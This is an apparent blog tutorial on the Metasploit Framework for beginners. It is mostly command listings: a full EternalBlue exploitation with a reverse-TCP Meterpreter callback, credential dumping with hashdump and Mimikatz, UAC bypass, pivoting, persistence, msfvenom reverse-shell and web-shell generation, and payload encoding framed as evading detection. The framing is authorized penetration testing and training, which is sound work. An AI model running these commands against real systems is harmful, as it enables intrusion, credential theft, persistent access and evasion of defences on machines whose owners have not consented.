Tools & Scripts 8 January 2026 5 min read

Metasploit Tutorial for Beginners: Getting Started with Exploitation

Metasploit Framework is the world’s most used penetration testing tool. This beginner-friendly tutorial covers how to use Metasploit for vulnerability exploitation, payload generation, and post-exploitation during authorized security assessments.

What is Metasploit?

Metasploit is an open-source framework for developing, testing, and executing exploits. It includes a massive database of exploits, payloads, and auxiliary modules that simplify penetration testing.

Installing Metasploit

Kali Linux (Pre-installed)

Metasploit comes pre-installed on Kali Linux. Update it with:

sudo apt update && sudo apt install metasploit-framework

Other Linux Distributions

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
./msfinstall

Starting Metasploit

# Initialize the database (first time)
sudo msfdb init

# Start Metasploit console
msfconsole

# Start with quiet mode (no banner)
msfconsole -q

Basic Metasploit Commands

# Search for modules
search [keyword]
search type:exploit platform:windows smb
search cve:2017-0144

# Get help
help
help search

# Module information
info [module]

# Use a module
use [module]

# Show options
show options
show advanced

# Set options
set RHOSTS 192.168.1.100
set RPORT 445
setg RHOSTS 192.168.1.100  # Set globally

# Run the module
run
exploit

# Go back
back

# Exit
exit

Understanding Module Types

Exploits

Modules that take advantage of vulnerabilities to gain access:

use exploit/windows/smb/ms17_010_eternalblue
use exploit/multi/http/apache_mod_cgi_bash_env_exec

Payloads

Code that runs after successful exploitation:

# Show available payloads
show payloads

# Set a payload
set payload windows/x64/meterpreter/reverse_tcp
set payload linux/x86/meterpreter/reverse_tcp

# Common payload types:
# reverse_tcp - Target connects back to attacker
# bind_tcp - Attacker connects to target
# meterpreter - Advanced payload with many features

Auxiliary

Scanning, fuzzing, and other non-exploit modules:

use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/portscan/tcp

Post

Post-exploitation modules for after gaining access:

use post/windows/gather/hashdump
use post/linux/gather/enum_users_history
use post/multi/manage/shell_to_meterpreter

Practical Example: EternalBlue

Step-by-step exploitation of MS17-010 (EternalBlue):

# Start Metasploit
msfconsole -q

# Search for the exploit
search ms17-010

# Use the exploit
use exploit/windows/smb/ms17_010_eternalblue

# View options
show options

# Set target
set RHOSTS 192.168.1.100

# Set payload
set payload windows/x64/meterpreter/reverse_tcp

# Set listener IP (your IP)
set LHOST 192.168.1.50

# Run the exploit
exploit

# If successful, you will have a Meterpreter session

Meterpreter Commands

Meterpreter is Metasploit’s advanced payload with powerful features:

Basic Commands

# System info
sysinfo

# Get current user
getuid

# Get privileges
getprivs

# Process list
ps

# Get shell
shell

# Return to Meterpreter
exit

# Background session
background

# List sessions
sessions -l

# Interact with session
sessions -i 1

File System Commands

# Current directory
pwd

# List files
ls

# Change directory
cd C:\\Users

# Download file
download C:\\Users\\Admin\\Desktop\\secret.txt

# Upload file
upload /tmp/backdoor.exe C:\\Windows\\Temp\\

# Search for files
search -f *.txt
search -f password* -d C:\\Users

Privilege Escalation

# Attempt to get SYSTEM
getsystem

# Check current privileges
getprivs

# Bypass UAC
use exploit/windows/local/bypassuac
set SESSION 1
run

Credential Harvesting

# Dump hashes (requires SYSTEM)
hashdump

# Run Mimikatz
load kiwi
creds_all
lsa_dump_sam
lsa_dump_secrets

# Dump credentials from memory
run post/windows/gather/credentials/credential_collector

Lateral Movement

# Port forward
portfwd add -l 3389 -p 3389 -r 192.168.1.200

# Route through session
run autoroute -s 10.10.10.0/24

# Pivot scanning
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.10.10.0/24
run

Persistence

# Windows persistence
run persistence -U -i 10 -p 4444 -r 192.168.1.50

# Using post modules
use exploit/windows/local/persistence
set SESSION 1
run

Generating Payloads with msfvenom

msfvenom creates standalone payloads for use outside Metasploit:

Common Payload Generation

# List payloads
msfvenom -l payloads

# List formats
msfvenom --list formats

# Windows executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe

# Linux ELF
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf

# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php

# Python payload
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py

# ASP payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp

# WAR file (Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war

Encoding Payloads

# List encoders
msfvenom -l encoders

# Encode to evade detection
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe

Setting Up Handlers

To catch incoming connections from payloads:

# In msfconsole
use exploit/multi/handler

# Set payload (must match generated payload)
set payload windows/x64/meterpreter/reverse_tcp

# Set listener options
set LHOST 0.0.0.0
set LPORT 4444

# Run in background
exploit -j

# Run and interact immediately
exploit

Database Commands

# Check database connection
db_status

# Import Nmap scan
db_import /path/to/nmap_scan.xml

# View hosts
hosts

# View services
services
services -p 445

# View vulnerabilities
vulns

# Run Nmap from Metasploit
db_nmap -sV -sC 192.168.1.0/24

Resource Scripts

Automate repetitive tasks with resource scripts:

# Create handler.rc
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit -j

# Run the script
msfconsole -r handler.rc

Tips for Effective Use

  1. Always enumerate first: Use Nmap and auxiliary scanners before exploitation
  2. Match payloads correctly: Ensure payload architecture matches target (x86 vs x64)
  3. Use staged payloads: Smaller initial payload, loads rest from attacker
  4. Check connectivity: Ensure your LHOST is reachable from target
  5. Document everything: Use workspaces and notes for organization

Summary

Metasploit is an essential tool for penetration testers. Start with basic scanning and exploitation, then progress to advanced Meterpreter usage and post-exploitation techniques. Always ensure you have proper authorization before using Metasploit against any target.

Written by

Window Events

Leave a Reply

Your email address will not be published. Required fields are marked *